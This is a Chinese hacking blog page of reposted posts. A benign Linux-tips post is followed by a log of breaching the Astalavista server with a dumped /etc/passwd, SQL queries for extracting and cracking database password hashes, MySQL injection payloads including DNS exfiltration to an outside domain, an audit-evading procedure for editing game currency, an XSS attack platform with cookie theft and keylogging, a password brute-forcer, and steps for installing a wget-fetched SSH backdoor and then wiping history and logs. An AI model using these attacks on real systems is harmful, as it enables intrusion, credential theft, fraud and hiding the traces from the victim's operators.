Linux小技巧收集[zz]

2011年6月11日 admin 没有评论

前言:因为用Linux的时间越来越长,所需要做的事也越来越多,效率成了我必需突破的瓶颈。在此总结一下这段时间用过的一些好的Linux技巧。以后时常补充这样自己要用的时候就很方便了。
Author:Ajian
[文本处理]
1、查看某文件的一部分
如果你只想看文件的前 5 行,可以使用 head 命令,
如:head -5 /etc/passwd
如果你想查看文件的后 10 行,可以使用 tail 命令,
如:tail -10 /etc/passwd
查看文件中间一段,可以使用 sed 命令
如:sed –n ’5,10p’ /etc/passwd 这样你就可以只查看文件的第 5 行到第 10 行

2、将 file.txt 里的123改为 456
方法 1
sed ‘s/123/456/g’ file.txt > file.txt.new 修改的保存到其它文件
sed -i ‘s/123/456/g’ file.txt 直接修改原文件
方法 2
vi file.txt
输入命令:
:%s/123/456/g
注意:如果替换的文件有特殊符号如/就要用\来取消。
例:sed -i ‘s/\/usr\/local\/apache2\/htdocs/\/var\/www\/html/g’ /usr/local/apache2/conf/httpd.conf
如果只是下原有的行后添加就用&
例:sed -i ‘s/DirectoryIndex index.html index.html.var/& index.htm index.php /g’ /usr/local/apache2/conf/httpd.conf
3、echo 典型应用
echo “abcdefg” | perl -lne ‘{$a = reverse($_); print $a;}’ 把一个字符串翻转
echo bottle|rev 把一个字符串翻转

[文件目录管理]
1、删除几天以前的所有东西(包括目录名和目录中的文件)
1) find . -ctime +3 -exec rm -rf {} \;
2) find ./ -mtime +3 -print|xargs rm -f –r

2、在多级目录中查找某个文件的方法
1) find /dir -name filename.ext
2) du -a | grep filename.ext
3) locate filename.ext

3、删除软硬连接注意点
删除软件连接的时候一定要记得不要在删除的文件夹后加一斜杠,
rm -f filename/
会说这是一个文件夹不能删除
rm filename
会提示说是否要删除这个连接。
如果用的第一种可能会把其它文件都删除

4、删除目录中含输入关键字的文件
find /mnt/ebook/ -type f -exec grep “在此输入关键字” {} \; -print -exec rm {} \;

5、在当前目录下解压 rpm 文件
cat kernel-ntfs-2.4.20-8.i686.rpm | rpm2cpio | pax –r

6、用命令清空 Root 回收站中的文件
cd /var/.Trash-root
rm -rf *

[系统与安全]
1、让用户的密码必须有一定的长度,并且符合复杂度
vi /etc/login.defs,修改 PASS_MIN_LEN

2、用 dat 查询昨天的日期
date –date=’yesterday’

3、修改系统时
1) 设置你的时区: timeconfig 里选择Asia/Shanghai (如果你位于 GMT+8 中国区域)
2) 与标准时间服务器校准: ntpdate time.nist.gov
date -s “2003-04-14 cst”,cst 指时区,时间设定用 date -s 18:10
修改后执行 clock -w 写到 CMOS
3) 将当前软件系统时间写入硬件时钟: hwclock –systohc
阅读全文…

分类: 小技巧 标签:

Astalavista被蹂躏过程

2011年3月24日 admin 没有评论

来源:素包子的博客

http://baoz.net/

里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看http://www.litespeedtech.com/litespeed-web-server-features.html。

[root@front3 ~]# curl -I litespeedtech.com
HTTP/1.1 200 OK
Date: Fri, 05 Jun 2009 22:54:51 GMT
Server: LiteSpeed

另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-

有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。

/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \
/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \
/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \
\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /
\/ \/ \/ \/ \/ \/ \/
The Hacking & Security Community
[+] Founded in 1997 by a hacker computer enthusiast
[-] Exposed in 2009 by anti-sec group

From < http://astalavista.com/faq>:
>> 03. Who’s behind the site?
>>
>> A team of security and IT professionals, and a countless number of contributors from all over the world.

>> 05. Is it true that the site is visited by script-kiddies and warez fans only?
>>
>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and
military institutions.
>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.

Why has Astalavista been targeted?

Other than the fact that they are not doing any of this for the “community” but
for the money, they spread exploits for kids, claim to be a security community
(with no real sense of security on their own servers), and they charge you $6.66
per months to access a dead forum with a directory filled with public releases
and outdated / broken services.

We wanted to see how good that “team of security and IT professionals” really is.

Let’s begin.

anti-sec:~# ./g0tshell astalavista.com -p 80
[+] Connecting to astalavista.com:80
[+] Grabbing banner…
LiteSpeed
[+] Injecting shellcode…
[-] Wait for it

[~] We g0tshell
uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
ID: uid=100(apache) gid=500(apache) groups=500(apache)

sh-3.2$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
apache:x:100:500::/var/www:/bin/false
diradmin:x:101:101::/usr/local/directadmin:/bin/bash
mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
webapps:x:500:501::/var/www/html:/bin/bash
majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
admin:x:501:502::/home/admin:/bin/bash
jon:x:502:503::/home/jon:/bin/bash
com:x:503:504::/home/com:/bin/bash
ntp:x:38:38::/etc/ntp:/sbin/nologin
ais:x:39:39:openais Standards Based Cluster Framework:/:/sbin/nologin
astanet:x:504:505::/home/astanet:/bin/bash
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin

sh-3.2$ cat /etc/hosts
# Do not remove the following line, or various programs
# that require network functionality will fail.
127.0.0.1 localhost.localdomain localhost
::1 localhost6.localdomain6 localhost6
80.74.154.172 asta1.astalavistaserver.com

sh-3.2$ pwd
/home/com/public_html

sh-3.2$ ls -la
total 18460
drwxr-xr-x 30 com apache 4096 May 28 17:06 .
drwx–x–x 11 com com 4096 Jun 25 2008 ..
drwxr-xr-x 2 com com 4096 Feb 2 19:29 admin
drwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache
drwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin
drwxrwxrwx 2 com com 4096 May 19 00:50 config
drwxr-xr-x 2 com com 4096 Mar 20 11:05 core
drwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules
drwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing
drwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo
drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__
-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php
drwxr-xr-x 2 com com 4096 Sep 9 2008 dvd
drwxr-xr-x 3 com com 4096 Feb 2 19:29 editor
-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico
drwxrwxrwx 2 com com 4096 Jun 4 08:00 feed
-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess
-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak
-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak
drwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool
drwxrwxrwx 14 com com 4096 Feb 2 19:29 images
-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php
drwxr-xr-x 6 com com 4096 Feb 2 19:29 installer
drwxr-xr-x 8 com com 4096 Feb 2 19:29 lang
drwxr-xr-x 22 com com 4096 Feb 2 19:29 lib
drwxrwxrwx 12 com com 4096 Jun 2 07:47 media
drwxr-xr-x 8 com com 4096 May 11 12:48 modifications
drwxr-xr-x 34 com com 4096 May 28 16:30 modules
drwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin
drwxrwxr-x 22 com com 4096 May 28 17:06 _new
drwxr-xr-x 26 com com 4096 Feb 2 19:27 _old
drwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy
drwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy
-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt
-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml
-rw-r–r– 1 com com 223 Mar 30 15:32 test.php
drwxrwxrwx 8 com com 4096 Mar 6 13:15 themes
drwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp
drwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam
阅读全文…

分类: 渗透测试 标签:

各种数据库密码hash获取语句

2011年3月24日 admin 没有评论

各种数据库密码hash获取语句,也可以直接使用sqlmap这个注入工具!

SQL Server 2000:-
SELECT password from master.dbo.sysxlogins where name=’sa’
0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A
0×0100- constant header
34767D5C- salt
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
crack the upper case hash in ‘cain and abel’ and then work the case sentive hash

SQL server 2005:-
SELECT password_hash FROM sys.sql_logins where name=’sa’
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
0×0100- constant header
993BF231-salt
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
crack case sensitive hash in cain, try brute force and dictionary based attacks.

update:- following bernardo’s comments:-
use function fn_varbintohexstr() to cast password in a hex string.
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins

MYSQL:-
In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.

*mysql < 4.1
mysql> SELECT PASSWORD(‘mypass’);
+——————–+
| PASSWORD(‘mypass’) |
+——————–+
| 6f8c114b58f2ce9e |
+——————–+

*mysql >=4.1
mysql> SELECT PASSWORD(‘mypass’);
+——————————————-+
| PASSWORD(‘mypass’) |
+——————————————-+
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
+——————————————-+
Select user, password from mysql.user
The hashes can be cracked in ‘cain and abel’

Postgres:-
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)
select usename, passwd from pg_shadow;
usename | passwd
——————+————————————-
testuser | md5fabb6d7172aadfda4753bf0507ed4396
use mdcrack to crack these hashes:-
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396

Oracle:-
select name, password, spare4 from sys.user$
hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
More on Oracle later, i am a bit bored….

分类: 默认分类 标签:

Mysql 另类盲注中的一些技巧

2011年3月2日 admin 没有评论

转:oldjun.com
—————————————————————————-

很多技巧从国外的paper学到的,不过国内没有多少人使用,所以发出来,笔记下~

一、order by 的参数注入技巧:
两种方法,思路都一样。

example. “select username,password from uc_members order by”.$_GET['oderby']

a.常见的利用方法:
1.[SQL] select username,password from uc_members order by 1,If((select 1)=2,1,(select value from uc_settings));
返回错误:[Err] 1242 – Subquery returns more than 1 row
2.[SQL] select username,password from uc_members order by 1,If((select 1)=1,1,(select value from uc_settings));
返回正常。

b.国外paper看到的方法:
1.[SQL] select username,password from uc_members order by 1,(select case when(2<1) then 1 else 1*(select username from uc_members)end)=1;
返回错误:[Err] 1242 - Subquery returns more than 1 row
2.[SQL] select username,password from uc_members order by 1,(select case when(2>1) then 1 else 1*(select username from uc_members)end)=1;
返回正常。

二、limit 的参数注入技巧:

a.order by之后的limit参数 的注入,因为正常的sql语句order by后无法接union,所以没有好办法,就一个鸡肋思路:into outfile ‘/www/root/xxx.php’;

b.limit前无order by时的注入,那就方便多了,后面可以直接接union select ,随便怎么注都行了:
select * from cdb_members limit 1 union select 1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7
这里还有个技巧,使用procedure analyse可以获取字段名称:
select * from cdb_members where uid=1 limit 1,1 procedure analyse()
不过procedure analyse同样不能使用在order by之后:
[SQL] select * from cdb_members order by uid desc limit 1 procedure analyse()
[Err] 1386 – Can’t use ORDER clause with this procedure

三、无法猜测字段时的技巧:

在mysql5以下版本或者information_schema 无法访问的时候,无法猜到某个表的字段名,于是可以采用这个办法,在子查询中使用%0,报错获得列名。以ucenter的uc_members为例。

1.猜测列数:SELECT 1 FROM `uc_members` where (SELECT * FROM `uc_members`)=(1)
返回错误:#1241 – Operand should contain 12 column(s)
2.SELECT 1 FROM `uc_members` where (1,2,3,4,5,6,7,8,9,10,11,12)=(SELECT * FROM `uc_members` union select 1,2,3,4,5,6,7,8,9,10,11,12 limit 1)
返回正常。
3.SELECT 1 FROM `uc_members` where (1,2,3,4,5,6,7,8,9,10,11,12)=(SELECT * FROM `uc_members` union select 1%0,2,3,4,5,6,7,8,9,10,11,12 limit 1)
返回错误:#1048 – Column ‘uid’ cannot be null
4.SELECT 1 FROM `uc_members` where (1,2,3,4,5,6,7,8,9,10,11,12)=(SELECT * FROM `uc_members` union select 1,2%0,3,4,5,6,7,8,9,10,11,12 limit 1)
返回错误:#1048 – Column ‘username’ cannot be null
5. ……

注:5.1以上版本不适用,字段必须为非空(not null)

四、windows下利用dns解析盲注的技巧:

如果盲注很累,或者页面无论and 1=1还是and 1=2的时候返回都一模一样,这个时候利用dns进行注入是个不错的方法,前提是win环境root权限下的mysql,利用load_file函数读取远程文件的思路。本地搭建一个dns服务器,然后将特定域名的NS server转过来。然后进行注入,并抓包。

本地测试了下(实际注入中单引号可以编码):select load_file(concat(‘\\\\aaa1.’,(select user()),’.oldjun.com\\a.txt’)),抓包成功获得select的结果:
29 28.524843 192.168.9.107 192.168.1.2 DNS Standard query A aaa1.root@localhost.oldjun.com

如图所示:

分类: 小技巧 标签:

mysql错误信息的利用

2011年3月2日 admin 没有评论

在很多的情况 下我们不能直接方便的进行注入,于是有了BENCHMARK延迟注射;
如果能得到MySQL的错误信息的话(必须是程序主动输出mysql错误,php中是调用mysql_error(),其他脚本可能有自己的函数),现在又有了更方便的方法。
网上流传了两三种方法:
=========================================================================

第一种略,略过了,低版本mysql适用

http://hi.baidu.com/toby57/blog/item/26416060c1d92c48eaf8f839.html

=========================================================================

第二种:

SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT ‘x’))a from information_schema.tables group by a)b;

ERROR 1062 (23000): Duplicate entry ’1x’ for key ‘group_key’

这种方法对MySQL版本没什么要求,但只能爆出64字节的数据,用这种方法遇到大数据只能MID慢慢来了。

(select 1 from (select count(*),concat((+++),floor(rand(0)*2))x from information_schema.tables group by x)k)

=========================================================================

第三种:

通过对ExtractValue和updataxml函数传递不合XPATH语法规则的参数来爆出数据。(只针对MySQL 5.1++,低于5.1的无此函数)

SELECT 1 AND ExtractValue(1, CONCAT(0x5c,(SELECT @@VERSION)))

ERROR 1105 (HY000): XPATH syntax error: ‘\5.1.40-community’

SELECT 1 FROM dede_admin WHERE updatexml(1,(SELECT CONCAT(0x5b,uname,0x3a,MID(pwd,4,16),0x5d) FROM dede_admin),1);

ERROR 1105 (HY000): XPATH syntax error: ‘[admin:7a57a5a743894a0e]‘

updatexml(1,CONCAT(0x5c,(SELECT @@VERSION)),1);

比上一种方法方便简洁,不过这方法只能爆出32字节的数据。同样,大数据只能Mid了。

百度一下这两个函数:
EXTRACTVALUE (XML_document, XPath_string);
第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc
第二个参数:XPath_string (Xpath格式的字符串)。
作用:从目标XML中返回包含所查询值的字符串
UPDATEXML (XML_document, XPath_string, new_value);
第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc
第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。
第三个参数:new_value,String格式,替换查找到的符合条件的数据
作用:改变文档中符合条件的节点的值

分类: 小技巧 标签:

Hacking Bash History

2010年12月31日 admin 没有评论

[==============================================================================]
[---------------------------[ Hacking Bash History ]—————————]
[==============================================================================]

By: ithilgore – ithilgore.ryu.L@gmail.com
July 2008

————-[ Table of Contents ]————-

i. Preface
ii. Hardening bash_history
iii. Attacking the logging mechanism
iv. Hacking bash – interfacing with syslog
v. Conclusion
vi. References

[ i. Preface ]
==============

Bash is probably the most widely used shell in the *nix world and one of it’s
features is the history mechanism. The history mechanism is mainly used for the
user’s convenience – less typing -> work done faster. However, it has been
discussed that bash_history can also be used as a logging mechanism to monitor
users’ activity. This article covers the arguments against the above and why the
mechanism is useless against someone who thinks out of the box. We are going
to see that every defensive measure taken for protecting the history file can
be subverted with little or no difficulty. The discussion will be increasive
in the strictness of the methods applied but that doesn’t meant they will be
increasingly difficult to implement. Most of them are no-brainers. In the end,
we are going to meddle with the bash source code to make the logging mechanism
(at first sight) “invincible” and we are going to see why even that can fail.

[ ii. Hardening bash_history ]
==============================

Suppose you are an administrator of a shell-providing box and there is a really
pesky user whose activities you would like to monitor, since you are really
suspicious about what he does late at night with the precious CPU power and
system resources that you have pledged to protect against malicious (or other)
usage. Let’s call the user Bob – enough of using Trinity as the “bad” one all
the time. Since all users use bash as their default shell in the server, you
start making a few changes to the bash configuration files.

// Step 1 //

– Make the bash history and relevant files undeletable/unchangeable.

The first thing Bob would probably do would be to symlink his history to
/dev/null.
阅读全文…

分类: Notepad 标签:

Anehta! — 新一代的web攻击平台

2010年12月29日 admin 没有评论

原文地址:

http://hi.baidu.com/aullik5/blog/item/203809540b611ac2b745aeee.html

两个礼拜了,从一开始的激动不已,到现在更加激动不已。
有很多想说,又不知从何说起。那么,还是采取FAQ的形式来向大家介绍吧!

Q: 为什么叫:Anehta ?
A: 因为“雅典娜”的名字是 :athena ,但是这个名字已经被sourceforge上的某人抢了,所以按照“刺氏命名法”,把“athena”反过来,本项目正式命名为: Anehta,中文发音:“阿内塔”

Q: Anehta 项目是做什么的?
A: 简单来说,你可以理解为 AttackAPI + BeEF。 但是Anehta 绝对没有这么简单,因为我实现了很多特有的机制,使得Anehta更加强大以及更加容易扩展。

Q: 没听过什么AttackAPI,还是不知道Anehta是做什么。
A: 更通俗来说,Anehta 就是一个跨站脚本攻击(XSS)的利用平台。

Q:Anehta是用什么语言开发的,对系统有什么要求?
A:由于在一开始就考虑到了通用性、跨平台性、跨浏览器、稳定性、易扩展性,所以Anehta在这方面做的是非常好的。anehta是基于javascript 和 PHP开发的。其中部分用到了 jQuery 框架,虽然anehta 可以独立于jQuery存在,但是考虑到引入jQuery 后,可以大大降低开发模块的成本,所以还是保留了。使用jQuery的另外一个好处就是跨浏览器,因为jQuery 本身是跨浏览器的,所以anehta也很容易做到这点.

使用PHP是因为PHP是当今使用最为广泛的脚本语言之一。(其实有个很不可告人的原因是因为大部分肉鸡都是PHP的吧,嘿嘿,anehta不需要任何perl、python、ruby等脚本支持)

Q:Anehta的架构是什么样的?
A:首先,我使用javascript 实现了一套JS框架,这套框架封装了很多函数和类,是专门用于攻击的一套JS框架。使用这套框架可以非常轻松的开发出威力强大的脚本。这套框架网站开发者也可以使用,可以获得很多强大的功能。

其次,基于这套框架,我开发了许多模块,比如本项目特有的“回旋镖模块”,可以跨域偷取cookie;再比如一个完美的JS键盘记录器等,还有很多功能,我会陆续补充好文档。

再次,anehta拥有非常清晰的结构,XSS后只需要加载一个feed.js,就会自动完成所有工作了。

最后,anehta不是纯客户端的,除了核心的JS攻击框架外,在服务端还利用PHP做了许多处理。

Q:Anehta具有什么特色和优点?
A:Anehta 结构清晰,功能是模块化,开发者可以单独为anehta开发各种各样的模块,以满足独特的需求。
模块之间具有低耦合性,互不影响。同时anehta的模块互相之间可以通信。

此外anetha还实现了很多独特、方便的技术。比如hook模块中,实现了可以hook任意js函数的方法。此外利用flash shared objects实现的水印技术也非常独特,即便用户删除了cookie,从IE切换到了Firefox或是Opera,也照样能够识别出是本人. 而回旋镖模块更是能够将反射型的XSS变成持久型的XSS,实时命令模块等都属于基本功能了。不久后我会补全anehta的文档,包括所有API的使用说明。

Anehta 的另一个特色就是会集成flash、java、css等多种hacking技术于一体,虽然目前还只实现了一小部分,但是我会慢慢把他们都做完。

此外,由于服务端的存在,所以Anehta 是一个平台(Platform),而并非一个框架(framework)。服务端设计还存在很大的开发潜力。
阅读全文…

分类: 工具代码 标签:

Update記錄

2010年12月29日 admin 没有评论

1.
select dbo.DoAlzXor(999) //999代表要刷的钱
返回一个负数.-5108668643680970581

2.
使用存储过程,避过太过于明显的审计.//注意他后面会不会加入我们这个存储过程,因为取名太象了.
CREATE PROCEDURE cabal_tool_character_ex( @characteridx int,@LEV int,@Alz bigint , @encrypted bigint)
AS
BEGIN
BEGIN TRAN
BEGIN
UPDATE cabal_character_table
SET LEV= @LEV,
SET Alz = @Alz,
Reserved1 = @encrypted
where characteridx = @characteridx
END
COMMIT TRAN
END
GO

3.确定要刷用户的信息

SELECT * FROM cabal_character_table WHERE CharacterIdx= 751576
4.
调用存储过程
exec cabal_tool_character_ex 751576,100,200000,-5108668643680970581
//用户id,金钱值,Reserved1值
5. drop PROCEDURE cabal_tool_character_ex

其他办法:

CREATE PROC cabal_guild_event_log
@UserNums int,
@mon bigint
as
DECLARE @reserv bigint
DELETE from cabal_warehouse_table WHERE UserNum = @UserNums
INSERT cabal_warehouse_table (UserNum, Data, Reserved1) VALUES ( @UserNums, 0x, DBO.DoAlzXor(@mon))
set @reserv = (select reserved1 from dbo.cabal_warehouse_table where usernum = @UserNums)
exec cabal_tool_SetWarehouseAlz @UserNums, @mon, @reserv
GO
__________________
DECLARE @RC int
DECLARE @characteridx int
DECLARE @Alz bigint
DECLARE @encrypted bigint
SELECT @characteridx = 704784
SELECT @Alz = 999
SELECT @encrypted = -5108668643680970581
EXEC @RC = [SERVER01].[dbo].[cabal_tool_character_ex] @characteridx, @Alz, @encrypted
DECLARE @PrnLine nvarchar(4000)
PRINT ‘Stored Procedure: SERVER01.dbo.cabal_tool_character_ex’
SELECT @PrnLine = ‘ Return Code = ‘ + CONVERT(nvarchar, @RC)
PRINT @PrnLine

分类: Notepad 标签:

PHP扫FTP\MYSQL\MSSQL\SSH密码的脚本

2010年12月29日 admin 没有评论

小Ablog看到的.转过来.

http://www.sablog.net/blog/scanpass-ftp-mysql-mssql-ssh/

可以扫FTP\MYSQL\MSSQL\SSH密码

比如webshell在linux下。不会在LINUX下渗透。可以试试这个。

scanpass

分类: 工具代码 标签:

ssh后门快速安装

2010年12月29日 admin 没有评论

1、mv /etc/ssh/ssh_config /etc/ssh/ssh_config.old
2、mv /etc/ssh/sshd_config /etc/ssh/sshd_config.old
3、下载并安装ssh后门:
shell-# wget http://192.168.1.188/sshbd.tgz
shell-# tar zxvf sshbd.tgz
shell-# cd openssh

4、设置ssh后门的登录密码:
vi versio.h
#define SSH_VERSION “OpenSSH_4.2″ –> you’ve to edit OpenSSH_4.2

vi includes.h
define _SECRET_PASSWD “test123″ -> edit as u wish password

5、继续安装:
shell-# ./configure –prefix=/usr –sysconfdir=/etc/ssh
shell-# make && make install
shell-# cp ssh_config sshd_config /etc/ssh/
touch -r  /etc/ssh/ssh_config.old /etc/ssh/ssh_config
touch -r  /etc/ssh/sshd_config.old /etc/ssh/sshd_config
shell-# /etc/init.d/sshd restart

6、登入后门:
ssh -l root 192.168.1.188
密码:test123
echo >/root/.bash_history //清空操作日志

7、清除apache日志:
export HISTFILE=/dev/null
export HISTSIZE=0
cd /etc/httpd/logs/
sed -i ‘/210.73.64.100/d’ access_log*

door

分类: 工具代码 标签: